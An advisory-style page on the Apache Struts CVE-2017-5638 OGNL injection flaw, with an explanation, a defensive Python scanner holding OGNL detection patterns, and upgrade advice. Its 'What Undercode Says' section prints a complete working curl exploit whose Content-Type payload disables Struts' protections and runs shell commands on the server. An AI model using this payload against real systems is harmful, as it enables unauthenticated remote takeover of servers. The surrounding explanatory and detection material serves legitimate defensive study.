Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

How the mentioned CVE works:

The CVE-2017-5638 vulnerability exists in the Jakarta Multipart parser of Apache Struts. When a file upload request is sent to a Struts application, the framework incorrectly handles the `Content-Type` header. An attacker can craft a malicious `Content-Type` value containing Object-Graph Navigation Language (OGNL) expressions. Due to flawed exception handling, the framework evaluates these expressions during the file upload process. This occurs because the error message, which incorporates the malicious header value, is parsed by the OGNL engine. This evaluation happens before any application-specific validation, allowing unauthenticated remote code execution. The attacker’s OGNL payload is executed with the same privileges as the Struts application server, leading to full system compromise.
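The core of the bug is that a header which should only ever hold a media type is instead reaching an expression evaluator. An added defensive example (not code from the DailyCVE page or the Struts project): a small scanner that checks Content-Type values against the media-type grammar and for OGNL markers, run over a constructed tab-separated request log with constructed sample lines.

```python
import re

# RFC 7231 media-type grammar: token "/" token, then optional ";name=value" parameters.
# OGNL syntax ("%{", "${", "(", "@") cannot satisfy this, so the structural check
# catches payload variants that keyword matching alone would miss.
TOKEN = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
MEDIA_TYPE_RE = re.compile(
    rf'^\s*{TOKEN}/{TOKEN}(?:\s*;\s*{TOKEN}=(?:{TOKEN}|"[^"]*"))*\s*$'
)

# Substrings typical of an OGNL expression or of the member-access bypass chain
# used against the Jakarta Multipart parser in CVE-2017-5638.
OGNL_MARKERS = ("%{", "${", "@ognl.", "_memberAccess", "OgnlUtil", "ProcessBuilder")

MAX_HEADER_LEN = 512  # assumption: a legitimate Content-Type is far shorter than this


def check_content_type(value: str) -> list[str]:
    """Return the reasons a Content-Type value looks like an OGNL injection attempt.
    An empty list means the header is structurally valid and carries no markers."""
    reasons = []
    if not MEDIA_TYPE_RE.match(value):
        reasons.append("not a valid media type")
    hits = [m for m in OGNL_MARKERS if m in value]
    if hits:
        reasons.append("OGNL markers: " + ", ".join(hits))
    if len(value) > MAX_HEADER_LEN:
        reasons.append(f"header length {len(value)} exceeds {MAX_HEADER_LEN}")
    return reasons


def scan_log(lines):
    """Scan constructed log lines 'ip<TAB>method<TAB>path<TAB>content-type' and
    return [(line_no, reasons)] for every line whose Content-Type is suspicious."""
    findings = []
    for n, line in enumerate(lines, 1):
        fields = line.rstrip("\n").split("\t", 3)
        if len(fields) < 4:
            continue  # malformed line, not a Content-Type finding
        reasons = check_content_type(fields[3])
        if reasons:
            findings.append((n, reasons))
    return findings


# Constructed sample log (RFC 5737 documentation addresses); lines 3 and 4 only
# mimic the shape of an S2-045 probe, they are not working payloads.
SAMPLE_LOG = [
    "203.0.113.5\tPOST\t/upload.action\tmultipart/form-data; boundary=----WebKitFormBoundaryA1b2C3",
    "198.51.100.7\tGET\t/index.action\tapplication/x-www-form-urlencoded",
    "203.0.113.9\tPOST\t/upload.action\t%{(_='multipart/form-data').(cmd='id')}",
    "203.0.113.9\tPOST\t/upload.action\t${@java.lang.System@getProperty('os.name')}",
]

if __name__ == "__main__":
    for line_no, reasons in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {'; '.join(reasons)}")
```

The same check can sit in a reverse proxy or WAF rule in front of an unpatched instance, but it is a detection aid, not a substitute for the upgrade.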

DailyCVE Form:

Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical

Date: 2017-03-07

Prediction: 2017-03-10

What Undercode Says:

`curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='id').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target/upload.action`

How to Exploit:

Craft a malicious HTTP request with an OGNL expression in the Content-Type header.

Protection from this CVE:

Upgrade to Struts 2.3.32 or 2.5.10.1.

Impact:

Remote system compromise.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode